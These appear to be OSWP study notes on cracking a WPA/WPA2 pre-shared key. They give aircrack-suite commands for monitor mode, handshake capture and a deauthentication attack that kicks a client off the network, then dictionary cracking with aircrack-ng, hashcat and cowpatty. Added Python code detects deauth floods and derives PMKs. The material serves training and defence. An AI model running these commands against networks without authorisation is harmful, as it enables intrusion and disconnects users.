WPA/WPA2


Last updated 6 months ago

Steps to crack a WPA/WPA2-PSK key. We will need to capture a WPA 4-way handshake.

1. Monitor mode

First, check for processes that would interfere and kill them with airmon-ng:

sudo airmon-ng check
sudo airmon-ng check kill

Next, we enable monitor mode:

sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 <channel_id>

# scan 5 GHz networks (band a)
sudo airodump-ng -b a wlan0

2. Finding target

We will now find the BSSID (AP MAC) and ESSID (network name) of our target:

sudo airodump-ng wlan0

Example output:

We found our target F0:A7:31:46:69:71 and see it's using WPA2 PSK auth. We can also see it's on channel 1.

3. Dumping & getting handshake

sudo airodump-ng -c 1 -w wpa2 --bssid F0:A7:31:46:69:71 wlan0

-c 1 sets the channel to 1

-w wpa2 writes the capture files with the prefix wpa2 (e.g. wpa2-01.cap)

--bssid selects the target AP MAC

wlan0 is our monitor interface

We now have to wait for a client to connect to the network, or force a reconnection with a deauthentication attack. We can see one station (client) is already connected: 8C:EC:7B:0F:63:24.

4. Re-authentication attack

We use aireplay-ng, which injects deauthentication frames over the air. The client gets kicked off and re-authenticates, and that re-authentication is the handshake we capture:

┌──(kali㉿kali)-[~/offsec/oswp]
└─$ sudo aireplay-ng -0 1 -a F0:A7:31:46:69:71 -c 8C:EC:7B:0F:63:24 wlan0
13:38:20  Waiting for beacon frame (BSSID: F0:A7:31:46:69:71) on channel 1
13:38:21  Sending 64 directed DeAuth (code 7). STMAC: [8C:EC:7B:0F:63:24] [ 0| 0 ACKs]

After that we see the "WPA handshake: X" status in airodump-ng:

We now have the handshake captured in the .cap file and can use aircrack-ng to crack the PSK.
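From the defender's side, the burst in the aireplay-ng output above (64 directed deauth frames with reason code 7 inside a second) is exactly the signature a wireless IDS alerts on. The following is an added example, not code from these notes: a small sliding-window detector run over constructed frame records whose MACs mirror the session above (timestamps and the record layout are made up for the demo).

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management-frame records, in the shape a
# monitoring sensor might log them: (timestamp_s, subtype, src, dst, reason).
# Addresses mirror the session above; the burst at t=20 mimics the
# "64 directed DeAuth (code 7)" that aireplay-ng -0 1 sends.
SAMPLE_FRAMES = [
    (10.0, "beacon", "F0:A7:31:46:69:71", "FF:FF:FF:FF:FF:FF", None),
    (12.5, "deauth", "F0:A7:31:46:69:71", "8C:EC:7B:0F:63:24", 3),   # lone, benign
    (15.0, "beacon", "F0:A7:31:46:69:71", "FF:FF:FF:FF:FF:FF", None),
] + [
    (20.0 + i * 0.01, "deauth", "F0:A7:31:46:69:71", "8C:EC:7B:0F:63:24", 7)
    for i in range(64)
]


def detect_deauth_floods(frames, window_s=2.0, threshold=10):
    """Return one alert per (src, dst) pair that receives at least `threshold`
    deauthentication frames inside any `window_s`-second sliding window.
    A single deauth is normal (roaming, idle timeout); a burst is not."""
    recent = defaultdict(deque)      # (src, dst) -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for ts, subtype, src, dst, reason in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:     # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": src, "station": dst, "count": len(q),
                           "first_ts": q[0], "last_ts": ts, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"DEAUTH FLOOD {a['bssid']} -> {a['station']}: "
              f"{a['count']} frames in {a['last_ts'] - a['first_ts']:.2f}s "
              f"(reason {a['reason']})")
```

On the mitigation side, enabling 802.11w Protected Management Frames makes the AP and clients reject forged deauthentication frames, so such a burst no longer disconnects anyone.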

5. Cracking

Now we run aircrack-ng with a wordlist against the capture file we gathered earlier:

aircrack-ng -w list.txt -e OSWP -b F0:A7:31:46:69:71 wpa2-01.cap

With hashcat

Convert the .cap to hashcat hash mode 22000:

hcxpcapngtool -o hash.hc22000 -E wordlist wpa2-01.cap

Crack it:

hashcat -m 22000 hash.hc22000 list.txt

With cowpatty

First generate the list of precomputed hashes (PMKs) for the target SSID:

genpmk -f list.txt -d oswphashes -s OSWP

Then crack it:

cowpatty -r wpa2-01.cap -d oswphashes -s OSWP

Connecting to WPA2 network

psk.conf:
network={
    ssid="wifi-mobile"
    psk="$PASSWORD"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}

Then connect on the wlan3 interface:

wpa_supplicant -Dnl80211 -iwlan3 -c psk.conf

And get DHCP IP:

dhclient wlan3 -v
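The genpmk hash list above and the psk= line in psk.conf are the same value: the Pairwise Master Key, derived from the passphrase and salted with the SSID, which is why a precomputed list only works for the SSID it was built for. This added example (my code, not from these notes) derives it with the Python standard library and emits the wpa_supplicant network block with the 64-hex PSK instead of the plaintext passphrase; the ssid and passphrase values are made up.

```python
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-Personal (IEEE 802.11i):
    PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 iterations, 256-bit output. This is what genpmk precomputes
    per SSID and what wpa_passphrase writes as the hex psk= value."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def network_block(ssid: str, passphrase: str) -> str:
    """wpa_supplicant network block carrying the precomputed hex PSK
    (an unquoted psk= value is the 64-hex PMK) so the config file does
    not have to hold the plaintext passphrase."""
    return (
        "network={\n"
        f'    ssid="{ssid}"\n'
        f"    psk={wpa2_pmk(passphrase, ssid).hex()}\n"
        "    scan_ssid=1\n"
        "    key_mgmt=WPA-PSK\n"
        "    proto=WPA2\n"
        "}\n"
    )


if __name__ == "__main__":
    # constructed demo values
    print(network_block("wifi-mobile", "correct horse battery staple"), end="")
```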
